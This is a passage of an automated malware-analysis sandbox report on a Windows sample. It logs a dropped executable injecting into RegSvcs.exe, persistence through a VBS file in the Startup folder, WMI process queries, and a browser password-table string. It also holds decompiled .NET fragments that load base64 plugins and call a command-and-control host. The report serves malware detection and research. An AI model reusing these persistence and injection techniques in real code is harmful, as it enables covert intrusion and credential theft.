Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\fCXrE8L4kRTm48Ov
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File created: C:\Users\user\AppData\Local\Temp\drawlingly Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs"
Source: 7xonkSJwuY.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegSvcs.exe, 00000002.00000002.1929347646.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1929347646.0000000002F56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7xonkSJwuY.exe ReversingLabs: Detection: 63%
Source: 7xonkSJwuY.exe Virustotal: Detection: 30%
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File read: C:\Users\user\Desktop\7xonkSJwuY.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\7xonkSJwuY.exe "C:\Users\user\Desktop\7xonkSJwuY.exe"
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\Desktop\7xonkSJwuY.exe"
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7xonkSJwuY.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe"
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe"
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\Desktop\7xonkSJwuY.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7xonkSJwuY.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe" Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: wntdll.pdbUGP source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: pteropod.exe, 00000001.00000003.1708097740.0000000004040000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1709011475.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1871597600.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, pteropod.exe, 00000005.00000003.1875000927.0000000003E20000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 1.2.pteropod.exe.c10000.1.raw.unpack, Messages.cs .Net Code: Memory
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, Messages.cs .Net Code: Memory
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
PE file contains an invalid checksum
Source: 7xonkSJwuY.exe Static PE information: real checksum: 0xa2135 should be: 0xc344d
Source: pteropod.exe.0.dr Static PE information: real checksum: 0xa2135 should be: 0xc344d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004171D1 push ecx; ret 1_2_004171E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0E013 push esp; ret 2_2_06F0E025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0DD17 push edi; iretd 2_2_06F0DD32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06F0EAC7 pushad ; ret 2_2_06F0EAD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070415B2 push eax; iretd 2_2_070415B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0708B628 push C40705FCh; iretd 2_2_0708B635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E3BCF push eax; ret 2_2_070E3BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E4274 pushad ; ret 2_2_070E4275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E4698 push es; ret 2_2_070E490C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_070E48FC push es; ret 2_2_070E490C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07146408 push esp; ret 2_2_07146409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07145FB0 push esp; retf 2_2_07145FBD
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004171D1 push ecx; ret 5_2_004171E4
Drops PE files
Source: C:\Users\user\Desktop\7xonkSJwuY.exe File created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Jump to dropped file

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pteropod.vbs Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_004772DE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_004772DE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_004375B0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_004772DE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_004375B0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
